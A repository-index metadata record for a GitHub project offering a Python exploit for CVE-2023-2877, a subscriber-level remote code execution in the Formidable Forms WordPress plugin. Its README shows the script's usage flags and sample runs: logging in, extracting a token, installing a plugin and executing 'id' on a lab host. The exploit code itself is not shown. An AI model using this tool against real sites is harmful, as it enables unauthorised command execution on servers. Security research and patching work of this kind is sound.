{"id":21125737,"url":"https://github.com/randomrobbiebf/cve-2023-2877","last_synced_at":"2025-04-13T07:55:33.924Z","repository":{"id":176872948,"uuid":"659681397","full_name":"RandomRobbieBF/CVE-2023-2877","owner":"RandomRobbieBF","description":"Formidable Forms \u003c 6.3.1 - Subscriber+ Remote Code Execution","archived":false,"fork":false,"pushed_at":"2023-06-28T11:25:04.000Z","size":15,"stargazers_count":2,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-13T07:55:31.420Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-06-28T10:34:08.000Z","updated_at":"2024-08-12T20:31:56.000Z","dependencies_parsed_at":null,"dependency_job_id":"4020f401-a1c3-4a7b-aa47-3afe667188fb","html_url":"https://github.com/RandomRobbieBF/CVE-2023-2877","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-2877"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-2877","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-2877/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-2877/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-2877/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-2877/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248681491,"owners_count":21144700,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:38.824Z","updated_at":"2025-04-13T07:55:33.914Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-2877\nFormidable Forms \u0026lt; 6.3.1 - Subscriber+ Remote Code Execution\n\n\nUsage\n---\n\n```\nusage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]\n\nCVE-2023-2877 - Formidable Forms \u003c 6.3.1 - Subscriber+ Remote Code Execution Script\n\noptions:\n  -h, --help            show this help message and exit\n  -w URL, --url URL     WordPress site URL\n  -u USERNAME, --username USERNAME\n                        WordPress username\n  -p PASSWORD, --password PASSWORD\n                        WordPress password\n  -pl PLUGIN, --plugin PLUGIN\n                        Different Plugin to Install i.e mstore-api.3.9.0.zip\n  -c CMD, --cmd CMD     Command value\n```\n\nExample\n---\n\n```\n$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1\nSuccessfully logged in.\nToken extracted: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d\nPlugin installed successfully.\nNow run exploit script with --cmd / -c and command.\n```\n\n```\n$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id\nData:\n[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]\n```\n\nWarning\n---\nYOU NEED TO UNINSTALL THE VULNERABLE PLUGIN User Post Gallery as it's got not authentication!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-2877","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-2877","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-2877/lists"}